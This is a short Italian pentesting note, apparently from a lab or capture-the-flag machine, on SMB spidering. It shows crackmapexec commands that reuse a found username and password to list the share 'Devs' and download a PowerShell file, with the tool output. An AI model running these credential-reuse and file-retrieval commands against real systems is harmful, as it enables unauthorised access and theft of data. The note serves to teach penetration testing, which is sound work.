tags: SMB SMB_Spidering Spidering
Quando si trovano delle credenziali e la vittima utilizza il servizio SMB è buona pratica provare quelle credenziali su ogni share presente, lo possiamo fare nel seguente modo:
crackmapexec smb 10.129.234.181 -u "john" -p 'SuperSecurePass123' --spider Devs --pattern .In questo caso abbiamo provato le credenziali sullo share Devs.
crackmapexec smb 10.129.234.181 -u "john" -p 'SuperSecurePass123' --spider Devs --pattern .
SMB 10.129.234.181 445 WIN01 [*] Windows Server 2019 Standard 17763 x64 (name:WIN01) (domain:WIN01) (signing:False) (SMBv1:True)
SMB 10.129.234.181 445 WIN01 [+] WIN01\john:SuperSecurePass123
SMB 10.129.234.181 445 WIN01 [*] Started spidering
SMB 10.129.234.181 445 WIN01 [*] Spidering .
SMB 10.129.234.181 445 WIN01 //10.129.234.181/Devs/. [dir]
SMB 10.129.234.181 445 WIN01 //10.129.234.181/Devs/.. [dir]
SMB 10.129.234.181 445 WIN01 //10.129.234.181/Devs/tmp.ps1 [lastm:'2025-02-23 22:32' size:1145]
SMB 10.129.234.181 445 WIN01 [*] Done spidering (Completed in 0.29802894592285156)E abbiamo trovato il file tmp.ps1.
Per scaricarlo possiamo utilizzare il seguente comando:
crackmapexec smb 10.129.234.181 -u "john" -p 'SuperSecurePass123' --share Devs --get-file tmp.ps1 tmp.ps1
SMB 10.129.234.181 445 WIN01 [*] Windows Server 2019 Standard 17763 x64 (name:WIN01) (domain:WIN01) (signing:False) (SMBv1:True)
SMB 10.129.234.181 445 WIN01 [+] WIN01\john:SuperSecurePass123
SMB 10.129.234.181 445 WIN01 [*] Copy tmp.ps1 to tmp.ps1
SMB 10.129.234.181 445 WIN01 [+] File tmp.ps1 was transferred to tmp.ps1